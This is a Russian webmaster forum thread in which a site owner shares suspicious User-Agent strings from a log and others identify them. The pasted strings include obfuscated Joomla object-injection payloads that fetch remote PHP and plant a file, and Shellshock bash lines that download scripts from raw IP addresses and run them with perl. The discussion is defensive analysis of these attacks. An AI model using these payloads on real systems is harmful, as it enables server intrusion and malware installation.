Странный UserAgent

Что за CMS у вас?

Только то что я написал, стандартной CMS нет

Не стандартная в смысле самописная? Вирус в каком файле удалил и где он лежит?

Могу в самописной найти дыру.

Но эти команды выполняются если только есть разрешение на выполнение system() функции, которая в 99% хостингах запрещена.

Файл /mylog/no_robot.log

В него записываются не распознанные UserAgent.

Вот что есть на данный момент

---------- Добавлено 22.01.2016 в 16:44 ----------

Значит кто-то все таки ищет как взломать сайт.

Смотрел еще на другом сайте, тоже есть похожее

the beast
}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:1095:"eval(chr(99).chr(111).chr(112).chr(121).chr(40).chr(39).chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(120).chr(111).chr(108).chr(111).chr(100).chr(111).chr(118).chr(110).chr(101).chr(116).chr(46).chr(114).chr(117).chr(47).chr(105).chr(109).chr(97).chr(103).chr(101).chr(115).chr(46).chr(116).chr(120).chr(116).chr(39).chr(44).chr(32).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(68).chr(79).chr(67).chr(85).chr(77).chr(69).chr(78).chr(84).chr(95).chr(82).chr(79).chr(79).chr(84).chr(39).chr(93).chr(46).chr(39).chr(47).chr(112).chr(108).chr(117).chr(103).chr(105).chr(110).chr(115).chr(47).chr(109).chr(115).chr(113).chr(108).chr(46).chr(112).chr(104).chr(112).chr(39).chr(41).chr(59).chr(32).chr(112).chr(114).chr(105).chr(110).chr(116).chr(40).chr(39).chr(113).chr(119).chr(101).chr(114).chr(116).chr(121).chr(108).chr(49).chr(50).chr(51).chr(52).chr(53).chr(54).chr(55).chr(56).chr(57).chr(117).chr(105).chr(111).chr(97).chr(115).chr(100).chr(102).chr(103).chr(104).chr(106).chr(107).chr(39).chr(41).chr(59));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}рэээ

}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:1310:"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2xvbC5waHAiIDsNCiRmcD1mb3BlbigiJGNoZWNrIiwidysiKTsNCmZ3cml0ZSgkZnAsYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbVoxYm1OMGFXOXVJR2gwZEhCZloyVjBLQ1IxY213cGV3MEtDU1JwYlNBOUlHTjFjbXhmYVc1cGRDZ2tkWEpzS1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlVrVlVWVkpPVkZKQlRsTkdSVklzSURFcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOURUMDVPUlVOVVZFbE5SVTlWVkN3Z01UQXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlHVDB4TVQxZE1UME5CVkVsUFRpd2dNU2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDBoRlFVUkZVaXdnTUNrN0RRb0pjbVYwZFhKdUlHTjFjbXhmWlhobFl5Z2thVzBwT3cwS0NXTjFjbXhmWTJ4dmMyVW9KR2x0S1RzTkNuME5DaVJqYUdWamF5QTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDJ4cFluSmhjbWxsY3k5emVYTjBaVzB1Y0dod0lpQTdEUW9rZEdWNGRDQTlJR2gwZEhCZloyVjBLQ2RvZEhSd09pOHZNVEUxTGpFeU5DNHhNakl1TXpBdmZtWnBkbVZvYjNOMEwzZDNMblI0ZENjcE93MEtKRzl3Wlc0Z1BTQm1iM0JsYmlna1kyaGxZMnNzSUNkM0p5azdEUXBtZDNKcGRHVW9KRzl3Wlc0c0lDUjBaWGgwS1RzTkNtWmpiRzl6WlNna2IzQmxiaWs3RFFwcFppaG1hV3hsWDJWNGFYTjBjeWdrWTJobFkyc3BLWHNOQ2lBZ0lDQmxZMmh2SUNSamFHVmpheTRpUEM5aWNqNGlPdzBLZldWc2MyVWdEUW9nSUdWamFHOGdJbTV2ZENCbGVHbDBjeUk3RFFwbFkyaHZJQ0prYjI1bElDNWNiaUFpSURzTkNnMEtRSFZ1YkdsdWF5aGZYMFpKVEVWZlh5azdEUW9OQ2cwS1B6ND0nKSk7DQpmY2xvc2UoJGZwKTs='));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}рэээ

Конечно, пытаются.

Говоря словами поручика Ржевского, если есть сайт - значит его уже пытаются взломать ! Не тот вопрос, которым стоит задаваться.

Так что именно вы хотели узнать ?

Стоит задаваться вопросом удалось ли им это.

Если файл /mylog/no_robot.log просто содержит разные строки useragent, то это не значит, что там есть код закладки, который исполняется. Это пока не считается удачный взломом, несмотря на мнение антивируса.

() { :;}; /bin/bash -c "cd /tmp;lwp-download -a http://66.194.27.49/sports;curl -O http://66.194.27.49/sports;wget http://66.194.27.49/sports;perl /tmp/sports*;perl sports;rm -rf /tmp/sports*"

() { :;}; /bin/bash -c "cd /tmp;lwp-download -a http://172.245.218.130/log.zip;curl -O http://172.245.218.130/log.zip;wget http://172.245.218.130/log.zip;perl /tmp/log.zip*;perl log.zip;rm -rf /tmp/log.zip*"

Судя по этой строке:

 sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched mambo for ".$1." seconds.");

которую можно найти в файле log.zip который скачивается с адреса http://172.245.218.130/log.zip который указан у вас в логах - идет поиск уязвимых мамб. Причем после захвата скан продолжается в том числе и с новой зараженной жертвы. Если мамба у вас не стоит - можно спать спокойно. А вообще, конечно, треш и угар - делать eval с user-agent - это как надо было писать (я про мамбу) Там видимо регулярки с флагом e использовались - в приличном обществе за это пальцы вырывают вместе с сухожилиями на глазах у юных программистов, дабы неповадно было и дурному примеру не следовали.

А это про широко известную уязвимость в bash.

Вот, например, как тут http://security.stackexchange.com/questions/68122/what-is-a-specific-example-of-how-the-shellshock-bash-bug-could-be-exploited

Разумеется, атакующий не знает есть ли там такие скрипты или нет. Сканируют всех.

точно.. Я про bash помню а про cgi как то не сообразил...

Хорошо, а в каком случае этот скрипт может запуститься?

Его надо чем-то открыть, или просто запустить с браузера, зная где будет прописана эта строчка?

e в регулярках обработчиков рефа - распространенный и долгоживущий бекдор

поэтому аффтар сканера наловит не сколько джомлов, сколько чужих бекдоров

возможно, это и есть основная цель :)